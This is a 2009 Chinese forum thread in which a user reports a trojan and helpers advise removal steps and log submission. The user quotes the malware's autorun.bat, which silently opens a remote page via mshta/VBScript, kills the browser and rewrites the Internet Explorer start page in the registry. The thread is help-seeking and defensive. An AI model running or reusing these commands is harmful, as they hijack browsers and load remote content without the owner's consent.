1   1  /  1  页   跳转

举报恶意网站

举报恶意网站

我电脑种木马了。我查到写文件。

c:\windows\autorun.bat

里面的内容是。
ping 127.0.0.1 -n 30
mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://union.115ku.cn/8616/auto.htm",0)(window.close)
ping 127.0.0.1 -n 10
taskkill /f /im iexplore.exe /t
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.115ku.com/ /f
mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://union.115ku.cn/8616/auto.htm",0)(window.close)
ping 127.0.0.1 -n 10
taskkill /f /im iexplore.exe /t
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.115ku.com/ /f


现在我的电脑开机就自动有流量。不知道是怎么搞的。希望版主帮我解决一下。

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; QQDownload 1.7; .NET CLR 2.0.50727)
分享到:
gototop
 

回复:举报恶意网站

将这个文件c:\windows\autorun.bat删除,根据批处理的内容,找到对应的注册表键值进行清理。如不行反病毒区上传sreng日志。
使用System Repair Engineer扫描日志,将日志作为附件上传上来。
下载页面:http://www.kztechs.com/sreng/download.html
操作方法:
1、下载后解压缩,运行SREngPS.EXE;
2、如果无法打开尝试把SREngPS.EXE改名为123.com,并复制到c:\windows目录下运行;
3、依次点击【智能扫描】-【扫描】,耐心等待,扫描结束后点击【保存报告】;
4、选择保存路径,文件名保持默认,直接点击【保存】;
5、打开保存的日志文件SREngLOG.log,完整复制全部内容,新建一个文本文档,将日志中的全部内容粘贴到“新建文本文档.txt”中;
6、将“新建文本文档.txt”作为附件上传,同时务必详细描述问题现象,如果有查杀不净的病毒务必提供病毒名和路径。
注意:扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等应用程序
gototop
 

回复: 举报恶意网站

我的电脑Windows目录里出现今天的文件有6个左右。今天被我删了。有VB的。还有可执行文件。
windows32下也同样会出现些。是些不一样的文件。这些程序还会调入内存。删的时候非常费劲。
本来想进安全模式删除就好了。可是安全模式进不去。走第一屏就蓝屏了。
今天我根据文件名查注册表,然后删除注册表的键值。在重启后删除 。

本来今天都删除了。可是晚上我突然发现又出现了。

我按照你的办法弄了一边,我把文件给你发上去。还有就是我用的是诺顿杀毒软件,我把杀毒的记录也传上来了。诺顿的记录扩展名是CSV,因为本网站不让传这个文件。我把扩展名改为TXT了。需要查看的话请改回来。
还有卡卡查杀到的记录。

麻烦您帮我看看。

附件附件:

下载次数:340
文件类型:text/plain
文件大小:
上传时间:2009-5-1 22:07:06
描述:txt

附件附件:

文件名:111.txt
下载次数:392
文件类型:text/plain
文件大小:
上传时间:2009-5-1 22:07:06
描述:txt

gototop
 

回复 3F 逍遥雾影 的帖子

将c:\program files\internet explorer\explor.exe这个文件打包发送至可疑文件交流区分析。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT